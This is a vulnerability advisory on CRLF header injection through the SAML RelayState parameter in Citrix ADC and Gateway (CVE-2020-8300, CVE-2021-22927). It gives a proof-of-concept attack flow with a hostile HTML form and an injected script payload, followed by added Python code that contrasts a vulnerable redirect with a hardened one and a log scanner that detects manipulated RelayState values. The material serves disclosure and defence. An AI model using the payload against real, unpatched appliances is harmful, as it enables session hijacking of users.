HTTP Header Injection in Citrix ADC and Citrix Gateway (CVE-2020-8300, CVE-2021-22927)

We have discovered a vulnerability in Citrix products (Citrix ADC and Citrix Gateway) that allowed an attacker to conduct HTTP header injection attacks. This could be abused to inject arbitrary JavaScript code into a page served by the appliance (comparable to Cross-Site Scripting).

Introduction

Citrix ADC, an application delivery controller, as well as Citrix Gateway, a workspace access solution, were susceptible to a header injection attack if configured as a SAML Service Provider (SP) or SAML Identity Provider (IdP).

An attacker was able to provide a victim with a manipulated link, which, when opened, would execute malicious JavaScript code, thus taking over the victim’s account.

Certitude responsibly disclosed this vulnerability to Citrix in December 2020. A patch release addresses this issue. Note that besides applying the patch, additional configuration steps are required to mitigate this vulnerability:

https://support.citrix.com/article/CTX316577

Vulnerability Overview

Citrix ADC and Citrix Gateway can be configured to act as a SAML Service Provider (SP). A vulnerability was identified in the SAML SP functionality that allowed an attacker to inject newline characters (CR-LF) into an HTTP response issued by the appliance. An attacker could abuse this behavior to, for example, execute JavaScript code in a victim's browser in the context of protected pages.

Proof of Concept

A normal, unaltered SAML authentication sequence works as follows:

  1. The user accesses a protected page (e.g. https://example.com/protected).
  2. The appliance redirects the user to the SAML Identity Provider (IdP), passing a SAMLRequest parameter as well as a RelayState parameter.
  3. The user authenticates on the IdP. If the user already has a session with the IdP, no further authentication is required (single sign-on).
  4. The IdP redirects the user back to the application and passes a SAMLResponse as well as the RelayState parameter it received from the appliance.
  5. The appliance verifies the SAMLResponse and redirects the user back to the protected page (https://example.com/protected).

The protected page the user tries to access is recorded in the RelayState parameter. The content of an example RelayState value, once base64-decoded, is as follows (\0 represents a NUL byte):

ns_policy=policy\0https://example.com/protected

During step 5 of the authentication process, the appliance decodes the RelayState parameter and copies the contained URL into the Location header of the redirecting HTTP response. As there are no authenticity/integrity checks on the RelayState parameter, an attacker can arbitrarily modify this URL. Due to the lack of proper encoding, newline characters (CR, LF) contained in the URL allow for HTTP header injection.
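The following Python script is an added example written for this page; it is not part of the Certitude advisory or of Citrix's code, and the appliance's internal implementation is not public. It reproduces the RelayState layout shown above, builds a redirect the flawed way (URL copied into Location unencoded) so the injected header and body become visible, and then shows the two checks a hardened SP needs: an HMAC binding the RelayState to the appliance (so the client cannot forge it) and an allow-list check on the decoded URL that rejects CR/LF/NUL before parsing. The function names, the secret key and the allow-listed host are assumptions for the demonstration.

```python
"""Added example (not Citrix code): how an unsigned RelayState turns into HTTP header
injection, and what a hardened redirect has to check. All names are hypothetical."""
import base64
import hashlib
import hmac
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SEPARATOR = b"\x00"  # NUL byte between ns_policy=<policy> and the URL, as shown in the advisory


def encode_relay_state(target_url: str, policy: str = "policy") -> str:
    """Build a RelayState in the layout the advisory shows: ns_policy=<policy>\\0<url>, base64-encoded."""
    raw = f"ns_policy={policy}".encode() + SEPARATOR + target_url.encode()
    return base64.b64encode(raw).decode()


def decode_relay_state(relay_state: str) -> Tuple[str, str]:
    """Return (policy part, target URL). latin-1 keeps every byte, including CR/LF, intact."""
    raw = base64.b64decode(relay_state)
    policy_part, _, url_part = raw.partition(SEPARATOR)
    return policy_part.decode("latin-1"), url_part.decode("latin-1")


def vulnerable_redirect(relay_state: str) -> bytes:
    """Mimics the flawed behaviour: the decoded URL is copied into Location without
    encoding, so CR/LF inside it terminate the header and add attacker headers and a body."""
    _, url = decode_relay_state(relay_state)
    return f"HTTP/1.1 302 Object Moved\r\nLocation: {url}\r\n\r\n".encode("latin-1")


def parse_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP response the way a browser would: status line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers, body


# --- hardened side ---------------------------------------------------------------

def sign_relay_state(relay_state: str, key: bytes) -> str:
    """Bind the RelayState to the appliance with an HMAC; the client can no longer forge it."""
    tag = hmac.new(key, relay_state.encode(), hashlib.sha256).hexdigest()
    return f"{relay_state}.{tag}"  # '.' is not in the base64 alphabet, so it is a safe delimiter


def verify_relay_state(signed: str, key: bytes) -> Optional[str]:
    """Return the RelayState only if its HMAC tag verifies; None otherwise."""
    relay_state, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, relay_state.encode(), hashlib.sha256).hexdigest()
    return relay_state if hmac.compare_digest(expected.encode(), tag.encode()) else None


def is_safe_redirect_target(url: str, allowed_host: str) -> bool:
    """Reject header-injection characters on the raw string first: recent CPython releases
    silently strip \\r, \\n and \\t inside urlsplit(), so a check after parsing would miss them."""
    if any(c in url for c in "\r\n\x00"):
        return False
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname == allowed_host


def hardened_redirect(signed_relay_state: str, key: bytes, allowed_host: str) -> Optional[bytes]:
    """Issue the redirect only for an authentic RelayState whose URL passes the allow-list."""
    relay_state = verify_relay_state(signed_relay_state, key)
    if relay_state is None:
        return None
    _, url = decode_relay_state(relay_state)
    if not is_safe_redirect_target(url, allowed_host):
        return None
    return f"HTTP/1.1 302 Object Moved\r\nLocation: {url}\r\n\r\n".encode("latin-1")


if __name__ == "__main__":
    key = b"appliance-secret"  # constructed key for the demonstration
    # The advisory's payload, smuggled through the RelayState URL field
    payload = "\r\nContent-Type: text/html\r\n\r\n<script>alert(1)</script>"
    print(parse_response(vulnerable_redirect(encode_relay_state(payload))))
    print(hardened_redirect(encode_relay_state(payload), key, "example.com"))  # no HMAC -> None
    print(hardened_redirect(sign_relay_state(encode_relay_state(payload), key), key, "example.com"))  # CR/LF -> None
    print(hardened_redirect(sign_relay_state(encode_relay_state("https://example.com/protected"), key),
                            key, "example.com"))
```

The HMAC closes the integrity gap the advisory describes (the appliance can tell its own RelayState from an attacker-supplied one), while the allow-list check is the defence in depth for the encoding problem: even a correctly signed RelayState is never copied into a header if it contains CR, LF or NUL, or if it points off-site.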

An attacker could employ the following scenario:

  1. The attacker accesses the protected page to retrieve a valid SAMLRequest.
  2. The attacker lures a victim who is logged in on the IdP to an attacker-controlled page.
  3. The page redirects the victim to the IdP using an HTML form:

     <form action="https://idp.example.com/sso" method="POST">
       <input type="hidden" name="SAMLRequest"
          value="<valid SAML Request from step #1>" />
       <input type="hidden" name="RelayState"
          value="<manipulated RelayState>" />
       <input type="submit" value="Submit request" />
     </form>

  4. After checking that the user is already authenticated, the IdP redirects the browser back to the appliance.
  5. The appliance issues an HTTP redirect containing the manipulated URL in the Location header.

An attacker could, for example, encode the following string as the URL part of the manipulated RelayState parameter (\r represents a CR byte, \n represents an LF byte):

\r\nContent-Type: text/html\r\n\r\n<script>alert(1)</script>

The appliance would then issue a response along the following lines:

HTTP/1.1 302 Object Moved
Location:
Content-Type: text/html

<script>alert(1)</script>

Google Chrome, for example, renders the injected body as HTML and executes the attacker-provided script. Other browsers may require a different payload.
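For defenders, the scenario above leaves a trace in any request log that records the RelayState parameter. The following Python script is an added example, not part of the advisory or of any Citrix tooling: it decodes RelayState values from log lines and flags those whose URL field contains CR/LF/NUL (a header injection attempt) or points to a host outside an allow-list. The log format, the sample lines, the hosts and the allow-list are constructed for the example; the real appliance and IdP log formats are not given in the advisory.

```python
"""Added example (not Citrix code): scan request logs for manipulated RelayState values.
The log format and all sample lines below are constructed for the demonstration."""
import base64
import binascii
import re
from typing import List, Optional, Set, Tuple
from urllib.parse import quote, unquote, urlsplit


def _relay_state(raw: bytes) -> str:
    """Build a URL-encoded, base64 RelayState for the constructed sample log."""
    return quote(base64.b64encode(raw).decode(), safe="")


# Constructed sample log: a legitimate login, the header-injection payload from the
# advisory, an off-site redirect target, and a request without RelayState.
SAMPLE_LOG = "\n".join([
    "2021-01-05T10:00:01Z client=203.0.113.10 path=/saml/acs RelayState="
    + _relay_state(b"ns_policy=policy\x00https://example.com/protected"),
    "2021-01-05T10:00:07Z client=198.51.100.7 path=/saml/acs RelayState="
    + _relay_state(b"ns_policy=policy\x00\r\nContent-Type: text/html\r\n\r\n<script>alert(1)</script>"),
    "2021-01-05T10:00:09Z client=198.51.100.7 path=/saml/acs RelayState="
    + _relay_state(b"ns_policy=policy\x00https://attacker.example/login"),
    "2021-01-05T10:00:12Z client=203.0.113.10 path=/protected",
])

RELAY_STATE_RE = re.compile(r"RelayState=(\S+)")


def decode_relay_state(value: str) -> Optional[bytes]:
    """URL-decode and base64-decode a logged RelayState; None if it is not valid base64."""
    try:
        return base64.b64decode(unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_relay_state(raw: bytes, allowed_hosts: Set[str]) -> List[str]:
    """Check the decoded ns_policy=<policy>\\0<url> layout and the redirect target."""
    findings: List[str] = []
    policy, sep, target = raw.partition(b"\x00")
    if not sep or not policy.startswith(b"ns_policy="):
        findings.append("RelayState does not have the ns_policy=<policy>\\0<url> layout")
    # Check raw bytes before urlsplit(): recent CPython strips CR/LF inside urlsplit()
    if re.search(rb"[\r\n\x00]", target):
        findings.append("CR/LF/NUL in redirect target (header injection attempt)")
    url = urlsplit(target.decode("latin-1"))
    if url.scheme != "https" or url.hostname not in allowed_hosts:
        findings.append(f"redirect target outside allowlist: {target!r}")
    return findings


def scan_log(text: str, allowed_hosts: Set[str]) -> List[Tuple[str, List[str]]]:
    """Return (log line, findings) for every line whose RelayState looks manipulated."""
    alerts: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        match = RELAY_STATE_RE.search(line)
        if not match:
            continue  # request carried no RelayState
        raw = decode_relay_state(match.group(1))
        findings = ["RelayState is not valid base64"] if raw is None else inspect_relay_state(raw, allowed_hosts)
        if findings:
            alerts.append((line, findings))
    return alerts


if __name__ == "__main__":
    for line, findings in scan_log(SAMPLE_LOG, {"example.com"}):
        print(line.split()[1], findings)
```

Because the IdP returns the RelayState to the appliance unchanged, the same check works on IdP-side logs of the initial SAMLRequest and on appliance-side logs of the SAMLResponse; an alert on the first hop identifies the attacker-controlled page, an alert on the second identifies the victim.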

Resolution

Citrix issued advisories urging affected organizations to upgrade to a version unaffected by this vulnerability. The issue was resolved with two separate patches, having separate CVE identifiers:

https://support.citrix.com/article/CTX297155 (CVE-2020-8300)
https://support.citrix.com/article/CTX319135 (CVE-2021-22927)

Moreover, additional configuration steps are required to mitigate this issue:

https://support.citrix.com/article/CTX316577

References

https://certitude.consulting/advisories/CSA_2021_004_HTTP_Header_Injection_in_Citrix_ADC_and_Citrix_Gateway.md.txt
https://support.citrix.com/article/CTX316577
https://support.citrix.com/article/CTX297155
https://support.citrix.com/article/CTX319135